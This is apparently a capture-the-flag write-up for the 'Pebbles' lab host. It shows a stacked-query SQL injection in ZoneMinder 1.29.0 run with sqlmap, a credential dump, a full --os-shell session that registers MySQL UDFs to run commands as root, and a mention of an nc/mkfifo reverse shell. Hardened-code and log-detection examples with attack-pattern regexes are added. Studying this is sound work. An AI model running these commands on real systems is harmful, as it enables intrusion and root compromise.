# Pebbles

## Intro

## Initial Foothold

Full TCP Port Scan

```
# Nmap 7.94SVN scan initiated Fri Apr 12 09:23:41 2024 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/joe/hax/pg/results/pebbles.pg/scans/_full_tcp_nmap.txt -oX /home/joe/hax/pg/results/pebbles.pg/scans/xml/_full_tcp_nmap.xml pebbles.pg
adjust_timeouts2: packet supposedly had rtt of -645411 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -645411 microseconds.  Ignoring time.
Nmap scan report for pebbles.pg (192.168.247.52)
Host is up, received user-set (0.040s latency).
Scanned at 2024-04-12 09:23:42 CDT for 113s
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE REASON         VERSION
21/tcp   open  ftp     syn-ack ttl 61 vsftpd 3.0.3
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:cf:5a:93:47:18:0e:7f:3d:6d:a5:af:f8:6a:a5:1e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTlsFY1sjAxyC1lqlzeHAaSC0ec76cB5Hoq6aVwMNphXzrhslKqJJ5L0sjOjQem02G6wukOQ/qIVzUZOPxdn4tlN+YuCRqrE7nSIj36hh6JeG4cI9t3qOJUPndLKuKSyJKwV1Dl7gQKcjS0gxO6kWybHMf4CT9a8QsF8mLDPNU3p5VfsEdrgJ+q5hNOmLYJPqwIHTdCweuSwaORn9wQGlmKphGZJlktEKEPwecDZO5KUc6g3N23G+vWv2uCmAw9ov8AQrePxdjz5/QQ8PdY6zedwcLUFjmL5jx9UhZLhDDf/pzP0wiswgm7DZXG6WHwMCbxNo0zX4/HFDswDHc/W+J
|   256 c7:63:6c:8a:b5:a7:6f:05:bf:d0:e3:90:b5:b8:96:58 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOrgGvGclvZKKtoTk+H0ojQxTTSKljSVFLY8udD6Cb8OQLjgd5F48Em8sa7JjoCa4Mn3USw7EttQLL9a1RNEgio=
|   256 93:b2:6a:11:63:86:1b:5e:f5:89:58:52:89:7f:f3:42 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBSm8eCxMlgt56SQ1z3TjY8R0ZY2MMMlYTB4Bby39xXE
80/tcp   open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Pebbles
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 7EC7ACEA6BB719ECE5FCE0009B57206B
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
3305/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
8080/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-favicon: Apache Tomcat
|_http-title: Tomcat
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 3.X|4.X (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.11 - 4.1 (88%), Linux 4.4 (88%), Linux 3.2.0 (85%), Linux 3.16 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.94SVN%E=4%D=4/12%OT=21%CT=%CU=%PV=Y%DS=4%DC=T%G=N%TM=6619445F%P=x86_64-pc-linux-gnu)
SEQ(SP=108%GCD=1%ISR=10C%TI=Z%TS=8)
OPS(O1=M551ST11NW7%O2=M551ST11NW7%O3=M551NNT11NW7%O4=M551ST11NW7%O5=M551ST11NW7%O6=M551ST11)
WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
ECN(R=Y%DF=Y%TG=40%W=7210%O=M551NNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)

Uptime guess: 0.005 days (since Fri Apr 12 09:19:05 2024)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   39.62 ms 192.168.45.1
2   39.54 ms 192.168.45.254
3   39.88 ms 192.168.251.1
4   39.80 ms pebbles.pg (192.168.247.52)

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 12 09:25:35 2024 -- 1 IP address (1 host up) scanned in 114.29 seconds
```

Open Ports

* 21/tcp - vsftpd 3.0.3
* 22/tcp - OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
* 80/tcp - Apache httpd 2.4.18 ((Ubuntu))
* 3305/tcp - Apache httpd 2.4.18 ((Ubuntu))
* 8080/tcp - Apache httpd 2.4.18 ((Ubuntu))

### Testing 21/tcp

No anonymous logon available

Credentials admin/admin did not result in access

### Testing 22/tcp

No brute forcing performed yet

### Testing 80/tcp

Login form was available on landing page

Login form showed no SQLi with sqlmap at up to `--level 2 --risk 2`

Found interesting directory - zm (ZoneMinder application)

### Testing 8080/tcp

No login page observed

Found interesting directory - zm (ZoneMinder application)

### Testing 3305/tcp

No login page observed

Found interesting directory - zm (ZoneMinder application)

Performed SQLi against ZoneMinder 1.29.0 via the `limit` parameter of the log-query request (stacked queries)

```
sqlmap -u 'http://pebbles.pg:3305/zm/index.php' --data 'view=request&request=log&task=query&limit=100' -p 'limit' -D 'zm' -T 'Users' -C Username,Password --dump
...
[10:12:07] [INFO] cracked password 'admin' for user 'admin'
Database: zm
Table: Users
[1 entry]
+----------+---------------------------------------------------+
| Username | Password                                          |
+----------+---------------------------------------------------+
| admin    | *4ACFE3202A5FF5CF467898FC58AAB1D615029441 (admin) |
+----------+---------------------------------------------------+
```
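The injection above works because the request's `limit` value is spliced into the SQL text and the driver runs every statement it receives. Added example (not ZoneMinder's code; schema, function names and the `executescript` stand-in for a stacked-statement driver are assumptions): the vulnerable shape beside a hardened handler that validates the value and binds it as a parameter.

```python
import re
import sqlite3

# Constructed stand-in for the ZoneMinder log-query request
# (view=request&request=log&task=query&limit=N) exploited above. Schema, names and the
# executescript stand-in for a driver that accepts stacked statements are assumptions.

def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE Logs(Id INTEGER PRIMARY KEY, Message TEXT);
        INSERT INTO Logs(Message) VALUES ('boot'), ('login'), ('motion');
    """)
    return con

def query_log_vulnerable(con, limit):
    # The raw request value is pasted into the SQL text and handed to an API that runs
    # every statement in the string, so "100; <anything>" executes <anything> as well.
    sql = "SELECT Message FROM Logs ORDER BY Id DESC LIMIT " + limit
    con.executescript(sql)

def query_log_hardened(con, raw_limit, max_limit=1000):
    # Allow-list validation first: the only acceptable shape is a bounded positive integer.
    if not re.fullmatch(r"[0-9]+", raw_limit) or not 1 <= int(raw_limit) <= max_limit:
        raise ValueError(f"invalid limit: {raw_limit!r}")
    # Then bind it as a parameter instead of splicing it into the statement text.
    rows = con.execute("SELECT Message FROM Logs ORDER BY Id DESC LIMIT ?", (int(raw_limit),))
    return [r[0] for r in rows]

def table_exists(con, name):
    q = "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?"
    return con.execute(q, (name,)).fetchone() is not None

if __name__ == "__main__":
    con = make_db()
    # Stacked-statement payload in the shape sqlmap used (100;SELECT SLEEP(5)#), adapted to SQLite.
    payload = "100; CREATE TABLE marker(x)"
    query_log_vulnerable(con, payload)
    print("vulnerable handler ran the attacker's statement:", table_exists(con, "marker"))
    print("hardened handler, limit=2:", query_log_hardened(con, "2"))
    try:
        query_log_hardened(con, payload)
    except ValueError as e:
        print("hardened handler rejected payload:", e)
```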

Attempting sqlmap's `--os-shell` option: with stacked queries as the MySQL root user, sqlmap uploads a UDF library into the plugin directory and registers `sys_exec`/`sys_eval` for OS command execution

```
sqlmap -u 'http://pebbles.pg:3305/zm/index.php' --data 'view=request&request=log&task=query&limit=100' -p 'limit' --os-shell
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.8.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:05:08 /2024-04-12/

[11:05:08] [INFO] resuming back-end DBMS 'mysql'
[11:05:08] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('ZMSESSID=muf90i9ed6t...1llf5i72a1;zmSkin=classic;zmCSS=classic'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: limit (POST)
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: view=request&request=log&task=query&limit=100;SELECT SLEEP(5)#
---
[11:05:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[11:05:10] [INFO] fingerprinting the back-end DBMS operating system
[11:05:10] [INFO] the back-end DBMS operating system is Linux
[11:05:10] [INFO] testing if current user is DBA
[11:05:10] [INFO] fetching current user
[11:05:10] [INFO] resumed: root@localhost
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 2
[11:05:15] [INFO] checking if UDF 'sys_exec' already exist
[11:05:15] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
UDF 'sys_exec' already exists, do you want to overwrite it? [y/N] y
[11:05:29] [INFO] checking if UDF 'sys_eval' already exist
[11:05:29] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[11:05:29] [INFO] detecting back-end DBMS version from its banner
[11:05:29] [INFO] resumed: 5.7.30-0ubuntu0.16.04.1
[11:05:29] [INFO] retrieving MySQL plugin directory absolute path
[11:05:29] [INFO] resumed: /usr/lib/mysql/plugin/
[11:05:32] [INFO] retrieved: 
[11:05:42] [INFO] adjusting time delay to 1 second due to good response times
8040
[11:05:50] [INFO] the local file '/tmp/sqlmapsu8jrs7w61063/lib_mysqludf_sysjm3mu5i0.so' and the remote file '/usr/lib/mysql/plugin/libsbtnb.so' have the same size (8040 B)
[11:05:50] [INFO] creating UDF 'sys_exec' from the binary UDF file
[11:05:50] [INFO] creating UDF 'sys_eval' from the binary UDF file
[11:05:50] [INFO] going to use injected user-defined functions 'sys_eval' and 'sys_exec' for operating system command execution
[11:05:50] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] Y
[11:06:03] [INFO] retrieved: root
command standard output: 'root'
os-shell> cat /root/proof.txt
do you want to retrieve the command standard output? [Y/n/a] Y
[11:06:33] [INFO] retrieved: 7574772785970f747047e659aa85b43a
command standard output: '7574772785970f747047e659aa85b43a'
```

A reverse shell was then caught by running an nc/mkfifo reverse-shell one-liner through sqlmap's `--os-shell`.
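Every step of the `--os-shell` chain above (time-based probing, stacked statements, the library written into `/usr/lib/mysql/plugin/`, the `CREATE FUNCTION ... SONAME` calls, and the `sys_eval`/`sys_exec` invocations) is visible server-side in the MySQL general log or an audit plugin's output. Added example (not part of the original writeup; the log lines are constructed in MySQL 5.7 general-log format and the SQL text is illustrative rather than sqlmap's exact queries): a small scanner that tags each step and confirms UDF command execution per connection thread.

```python
import re

# Constructed MySQL 5.7-style general-log lines (time, thread id, command, argument) modelled on
# the steps sqlmap's --os-shell performed above; the SQL text is illustrative, not sqlmap's exact queries.
SAMPLE_LOG = """\
2024-04-12T16:05:08.102Z    41 Query    SELECT * FROM Logs ORDER BY TimeKey DESC LIMIT 100
2024-04-12T16:05:10.407Z    41 Query    SELECT * FROM Logs ORDER BY TimeKey DESC LIMIT 100;SELECT SLEEP(5)
2024-04-12T16:05:44.911Z    42 Query    SELECT 0x7f454c46 INTO DUMPFILE '/usr/lib/mysql/plugin/libsbtnb.so'
2024-04-12T16:05:50.013Z    42 Query    CREATE FUNCTION sys_exec RETURNS int SONAME 'libsbtnb.so'
2024-04-12T16:05:50.020Z    42 Query    CREATE FUNCTION sys_eval RETURNS string SONAME 'libsbtnb.so'
2024-04-12T16:06:03.300Z    42 Query    SELECT sys_eval('whoami')
2024-04-12T16:07:00.000Z    43 Query    SELECT Username FROM Users LIMIT 10
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<tid>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")

# One rule per step of the chain: time-based probing, stacking, dropping a library into the
# plugin directory, registering UDFs from it, and finally calling them.
RULES = [
    ("time_probe",    re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)),
    ("stacked_query", re.compile(r";\s*(?:SELECT|INSERT|UPDATE|DELETE|CREATE|DROP)\b", re.I)),
    ("file_write",    re.compile(r"\bINTO\s+(?:DUMPFILE|OUTFILE)\b", re.I)),
    ("udf_creation",  re.compile(r"\bCREATE\s+(?:AGGREGATE\s+)?FUNCTION\b.*\bSONAME\b", re.I)),
    ("udf_exec_call", re.compile(r"\bsys_(?:exec|eval)\s*\(", re.I)),
]

def scan_general_log(text):
    """Return (thread_id, matched_rule_names, query) for every suspicious Query line."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["cmd"] != "Query":
            continue
        tags = [name for name, rx in RULES if rx.search(m["arg"])]
        if tags:
            findings.append((int(m["tid"]), tags, m["arg"]))
    return findings

def udf_rce_threads(findings):
    """Threads that both registered a UDF and called sys_exec/sys_eval: confirmed OS command execution."""
    by_thread = {}
    for tid, tags, _ in findings:
        by_thread.setdefault(tid, set()).update(tags)
    return sorted(t for t, tags in by_thread.items() if {"udf_creation", "udf_exec_call"} <= tags)

if __name__ == "__main__":
    found = scan_general_log(SAMPLE_LOG)
    for tid, tags, query in found:
        print(f"thread {tid}: {', '.join(tags)}: {query}")
    print("UDF command execution confirmed on threads:", udf_rce_threads(found))
```

The general log is off by default and verbose, so in practice the same rules are better applied to an audit plugin's output; on a live server, `SELECT * FROM mysql.func` lists the UDFs currently registered and is the quickest check for leftover `sys_exec`/`sys_eval` entries.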


## Privilege Escalation

No privilege escalation required: the UDF shell already ran as root, because the MySQL service on this host runs as root and the injected `sys_eval`/`sys_exec` functions execute inside the mysqld process.
